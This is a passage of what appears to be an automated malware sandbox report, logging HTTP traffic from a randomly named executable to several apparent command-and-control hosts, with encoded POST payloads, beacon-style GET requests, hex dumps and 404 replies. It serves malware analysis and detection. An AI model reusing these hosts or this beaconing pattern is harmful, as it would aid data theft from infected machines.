                                                                                Data Raw: 66 68 3d 61 61 76 70 57 66 2f 44 4d 74 6b 38 34 43 32 46 79 74 64 48 69 6e 43 77 66 4b 37 53 45 75 4b 48 63 65 53 68 48 37 2b 69 72 55 58 6d 35 59 77 6f 48 38 67 37 59 31 38 33 4a 6d 42 61 33 47 56 73 6d 79 7a 66 53 69 38 62 58 77 69 6e 2b 75 78 62 46 38 68 65 59 7a 6f 6d 7a 4e 79 57 4b 37 58 33 63 6e 55 51 5a 2f 76 49 78 42 56 31 5a 62 69 4b 6e 39 49 6a 53 50 49 50 6f 39 5a 34 4b 4c 2b 65 35 58 42 31 75 5a 69 39 4d 57 62 59 35 63 53 46 73 6e 49 33 4d 44 50 75 75 51 43 75 6e 38 41 78 68 58 48 4f 73 33 6e 79 68 76 64 4e 39 44 41 50 48 62 42 69 73 6e 2b 70 70 68 30 68 4b 58 61 6f 4e 6c 53 32 76 78 65 35 72 73 64 4b 6e 43 31 69 74 74 6e 70 68 67 46 6d 34 4f 50 32
                                                                                Data Ascii: fh=aavpWf/DMtk84C2FytdHinCwfK7SEuKHceShH7+irUXm5YwoH8g7Y183JmBa3GVsmyzfSi8bXwin+uxbF8heYzomzNyWK7X3cnUQZ/vIxBV1ZbiKn9IjSPIPo9Z4KL+e5XB1uZi9MWbY5cSFsnI3MDPuuQCun8AxhXHOs3nyhvdN9DAPHbBisn+pph0hKXaoNlS2vxe5rsdKnC1ittnphgFm4OP2
                                                                                Dec 3, 2024 14:22:54.666712046 CET302INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:54 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.54999238.47.207.164801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:55.747797012 CET1805OUTPOST /sa1b/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.t19yd.top
                                                                                Origin: http://www.t19yd.top
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.t19yd.top/sa1b/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 61 61 76 70 57 66 2f 44 4d 74 6b 38 34 43 32 46 79 74 64 48 69 6e 43 77 66 4b 37 53 45 75 4b 48 63 65 53 68 48 37 2b 69 72 55 50 6d 34 71 6f 6f 49 39 67 37 5a 31 38 33 42 47 42 66 33 47 56 4c 6d 79 36 57 53 69 68 6d 58 30 53 6e 2f 4c 39 62 4f 74 68 65 50 6a 6f 6d 38 74 79 58 45 62 58 69 63 6a 34 55 5a 2f 66 49 78 42 56 31 5a 5a 71 4b 75 49 6b 6a 55 50 49 41 38 74 59 33 4f 4c 2f 78 35 57 6b 58 75 5a 6d 4c 50 6d 37 59 35 38 43 46 38 42 55 33 42 44 50 73 67 77 44 72 6e 38 46 7a 68 55 6a 34 73 32 53 6c 68 6f 78 4e 35 32 68 70 58 50 51 38 79 78 36 5a 70 43 6b 57 63 41 69 53 45 56 69 77 73 53 69 72 70 59 42 44 74 48 31 30 35 4a 2b 41 79 42 63 38 33 35 32 34 51 70 4c 6e 78 2b 59 61 6d 31 31 39 74 58 7a 34 42 58 32 50 54 4f 49 50 51 41 69 65 73 76 50 51 72 59 6c 62 64 36 48 36 75 43 7a 58 6d 34 57 41 65 47 48 54 70 4c 6f 5a 70 31 6d 36 49 50 35 78 77 61 4d 6f 59 77 30 38 57 58 64 57 67 78 42 50 34 62 53 61 6e 79 46 52 46 48 6a 76 42 6e 45 64 55 4e 6b 6d 31 4a 2b 63 6a 51 4b 64 59 70 6c 76 6f 74 62 [TRUNCATED]
                                                                                Data Ascii: fh=aavpWf/DMtk84C2FytdHinCwfK7SEuKHceShH7+irUPm4qooI9g7Z183BGBf3GVLmy6WSihmX0Sn/L9bOthePjom8tyXEbXicj4UZ/fIxBV1ZZqKuIkjUPIA8tY3OL/x5WkXuZmLPm7Y58CF8BU3BDPsgwDrn8FzhUj4s2SlhoxN52hpXPQ8yx6ZpCkWcAiSEViwsSirpYBDtH105J+AyBc83524QpLnx+Yam119tXz4BX2PTOIPQAiesvPQrYlbd6H6uCzXm4WAeGHTpLoZp1m6IP5xwaMoYw08WXdWgxBP4bSanyFRFHjvBnEdUNkm1J+cjQKdYplvotbBKiXa2xDtZZb2yP6GFoYG70VAU1d7oj/XqOtyaLKfbmP17JAJmE3IcJmHxnR83JxCkZiWB+gcLbb97KQHXAclT1abNl1YAtQznJqEWUcuzmgaFATmRPnJ+05jKnv/0UB/yvBfS8PJaxQ0iRvSd0qs7NPNt7PL/selCnvaZfg73Cp22CP3l7t9nIX918DvfpqYIxfJXEZAqdLKirqyQoNz+sdh4HrM/YXXiXPEZHa9os9zeUlqjyYSTVLqVcA8JnrJkBSn0IoE7G7glwE6svxMnmbiadHxXvMI3ZK0YSDnDjtOg/LfDy+SzOvEUeB14ubkOvKLF90tia98BSFD2ZcZda2X3ikg47h7DwjcXolIAis/3HB9pP9m4N0z+sbeTkWv8KEjZuON3mw92CeUf+/rHLQk64TTMgcQxRC1DhHfv4e+oON1pW4Rz9es4lrfIn6VLdegfma4pvb2aFBA1OLzMRe74C88z3f6ajBzJpY4u6dYzW816XZasmYIs6v02KbCr3BDow3TFu6SkDEJMyjFQx0nP9/sCUZY1M0Wwls8D42kvTtIBMXtQToItsS881jih+8do8krhX6qzjyZl+LJdBYU239NjjyNQmQy/VSFBSfwv1uBzJ2w69yoIvpLlPSBMIxkLm3iERE9mEX6hRucSodvuuXVRflaz [TRUNCATED]
                                                                                Dec 3, 2024 14:22:57.322221994 CET302INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:57 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.54999838.47.207.164801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:58.417763948 CET521OUTGET /sa1b/?fh=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/veVHbD1fWEHf5TqpC81TauCsO8XC98q6/wqQrn6ig==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.t19yd.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:00.043262005 CET302INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.550004208.115.225.220801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:06.150337934 CET789OUTPOST /gua3/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.atendefacil.info
                                                                                Origin: http://www.atendefacil.info
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.atendefacil.info/gua3/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 54 35 68 65 6c 77 53 53 53 53 53 77 6d 2b 35 5a 62 55 4f 66 45 58 69 56 74 42 55 55 5a 4a 69 6f 6d 6f 74 6a 69 69 52 61 30 32 4b 6e 48 7a 49 35 33 55 74 66 50 6d 69 4b 69 65 53 67 65 52 69 78 46 33 39 53 57 64 6b 38 72 31 6e 70 46 33 47 36 6d 72 6c 64 4d 4b 37 72 4a 66 4d 74 55 44 37 59 48 48 61 2f 70 61 7a 34 6e 68 2f 2b 6c 4f 57 2b 33 63 69 42 79 65 78 37 6f 39 33 48 47 4b 53 4b 41 4a 4f 7a 68 58 43 75 6c 6a 45 7a 49 63 77 54 46 64 35 46 47 73 63 78 4e 50 53 68 4b 4b 53 50 39 39 72 49 41 57 70 35 4d 44 41 33 6a 51 37 48 55 47 58 33 32 4c 6e 43 31 4f 67 3d
                                                                                Data Ascii: fh=CGsRQZD1c2LTT5helwSSSSSwm+5ZbUOfEXiVtBUUZJiomotjiiRa02KnHzI53UtfPmiKieSgeRixF39SWdk8r1npF3G6mrldMK7rJfMtUD7YHHa/paz4nh/+lOW+3ciByex7o93HGKSKAJOzhXCuljEzIcwTFd5FGscxNPShKKSP99rIAWp5MDA3jQ7HUGX32LnC1Og=
                                                                                Dec 3, 2024 14:23:07.323339939 CET481INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:07 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.550005208.115.225.220801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:08.810997009 CET809OUTPOST /gua3/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.atendefacil.info
                                                                                Origin: http://www.atendefacil.info
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.atendefacil.info/gua3/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 53 59 52 65 70 7a 36 53 5a 53 53 76 73 65 35 5a 42 6b 4f 62 45 58 75 56 74 46 4e 5a 5a 66 79 6f 6e 4c 35 6a 6a 6a 52 61 7a 32 4b 6e 50 54 49 38 7a 55 74 71 50 6d 6e 33 69 65 75 67 65 52 32 78 46 30 70 53 58 75 63 2f 78 46 6e 72 4f 58 47 43 37 62 6c 64 4d 4b 37 72 4a 66 5a 47 55 43 54 59 48 58 71 2f 6f 37 7a 33 37 78 2f 2f 7a 2b 57 2b 7a 63 6a 70 79 65 77 63 6f 2f 43 63 47 4d 65 4b 41 49 2b 7a 67 43 75 74 73 6a 45 31 57 73 78 59 42 65 67 4c 65 63 42 2b 50 5a 6e 61 56 63 69 71 38 4c 61 69 61 30 68 52 66 6a 73 50 7a 44 7a 77 46 32 32 65 73 6f 33 79 72 5a 33 34 49 34 58 63 33 4a 6f 4b 74 45 66 47 67 59 7a 61 49 30 32 6c
                                                                                Data Ascii: fh=CGsRQZD1c2LTSYRepz6SZSSvse5ZBkObEXuVtFNZZfyonL5jjjRaz2KnPTI8zUtqPmn3ieugeR2xF0pSXuc/xFnrOXGC7bldMK7rJfZGUCTYHXq/o7z37x//z+W+zcjpyewco/CcGMeKAI+zgCutsjE1WsxYBegLecB+PZnaVciq8Laia0hRfjsPzDzwF22eso3yrZ34I4Xc3JoKtEfGgYzaI02l
                                                                                Dec 3, 2024 14:23:09.944009066 CET481INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:09 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.550006208.115.225.220801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:11.490062952 CET1826OUTPOST /gua3/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.atendefacil.info
                                                                                Origin: http://www.atendefacil.info
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.atendefacil.info/gua3/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 53 59 52 65 70 7a 36 53 5a 53 53 76 73 65 35 5a 42 6b 4f 62 45 58 75 56 74 46 4e 5a 5a 66 36 6f 6d 37 6c 6a 6c 41 35 61 79 32 4b 6e 54 44 49 39 7a 55 74 4e 50 6e 43 77 69 65 69 57 65 54 4f 78 45 55 31 53 65 37 77 2f 2f 31 6e 72 54 48 47 35 6d 72 6b 46 4d 4b 71 69 4a 66 4a 47 55 43 54 59 48 56 43 2f 76 71 7a 33 6f 42 2f 2b 6c 4f 57 36 33 63 6a 53 79 66 56 6a 6f 2f 58 70 47 38 2b 4b 42 6f 75 7a 74 55 36 74 6a 6a 45 33 58 73 77 59 42 65 63 41 65 63 63 42 50 64 6e 67 56 62 4f 71 2b 4b 36 2b 4a 33 42 36 45 6c 6f 54 77 52 44 32 66 57 76 6e 70 4c 33 67 76 75 44 74 45 34 4b 79 35 4a 49 6c 6e 58 7a 50 2b 50 50 78 48 30 54 4e 39 2b 38 52 70 56 5a 69 68 36 52 30 72 61 63 48 4c 68 66 69 44 7a 65 47 76 57 41 79 66 4f 44 6e 4b 77 43 6f 38 51 56 6a 76 32 66 37 37 43 76 62 4f 4b 71 46 4f 32 39 67 66 61 48 75 54 6d 45 33 56 4f 2f 4c 71 51 65 48 61 71 72 48 2f 65 45 36 50 70 69 41 39 62 73 30 63 69 75 66 51 63 47 4c 76 4b 47 62 51 4d 45 30 34 36 50 4d 7a 52 4d 56 2f 58 78 [TRUNCATED]
                                                                                Data Ascii: fh=CGsRQZD1c2LTSYRepz6SZSSvse5ZBkObEXuVtFNZZf6om7ljlA5ay2KnTDI9zUtNPnCwieiWeTOxEU1Se7w//1nrTHG5mrkFMKqiJfJGUCTYHVC/vqz3oB/+lOW63cjSyfVjo/XpG8+KBouztU6tjjE3XswYBecAeccBPdngVbOq+K6+J3B6EloTwRD2fWvnpL3gvuDtE4Ky5JIlnXzP+PPxH0TN9+8RpVZih6R0racHLhfiDzeGvWAyfODnKwCo8QVjv2f77CvbOKqFO29gfaHuTmE3VO/LqQeHaqrH/eE6PpiA9bs0ciufQcGLvKGbQME046PMzRMV/XxcSbXlOLLjhTbspqjWmGSHePlquSeVtQQADn92yxWP6Lp8vms1g1mdHFAaWI0o8CbWep7PbwumgJRCC8rj1QsXB+oCnxI9nPgUNCX2bKvdFllk4oAPtyqHmNAIGbXo1E89XjgJxcsqNbM6zDzhArEiMMqfZx+8jR+c9rL/oAStDGa+kUNsW4KV4tBYUfKVSfuU+SpMBto9Ar26fBMy7NH8cWKu1ws5MMsZOZIVR5AXnmuxj5y7F5zXyXKx7GUCWUlz+5CSuy7GjblHFMqqy3u4xTK1SSgs1pqNxhpIOZCTn2MoB7mwMlO+NF8o5vCDV2UgXwZjVQu2yN0Dnp0LyIRhGHDy6JFpeOyavwP7Np7vYdpyhy7uoCd+U2QRuvKPrASJCeKBm2ITG0RndhszQqtg57I+k3t5oElEp2u1JT4P+kEO+LVKN+/X3ozkRT0ks5IiKmJzsxr7PWB6WJGSYLfLW8PUp5nng/40w1NRhgmGnFE5dRTFL7T+QQDh1DdShwo6lfc7m/UIYTD1QkTN/LvBGl0e++NvjY4FQ17CeNWvVk0pwebkg6qf55PXUM3pt7M0T7w7ZTKq1tfUBRmymzlpuX4+Poe/WZGwfc0pw5eJEoJKCXNyT8eBWENoV+iDVF26gZx/1kKtmnlTQsKb8YuNL3OUnwDP2gahb [TRUNCATED]
                                                                                Dec 3, 2024 14:23:12.659482002 CET481INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:12 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.550007208.115.225.220801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:14.150935888 CET528OUTGET /gua3/?fh=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE1my8b04S6WdWKB/MDuWSU+6nbfM6wifiPOcueyLhQ==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.atendefacil.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:15.314378977 CET481INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:23:15 GMT
                                                                                Server: Apache/2
                                                                                Content-Length: 315
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.550008104.21.15.100801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:29.428633928 CET789OUTPOST /k4tn/ HTTP/1.1
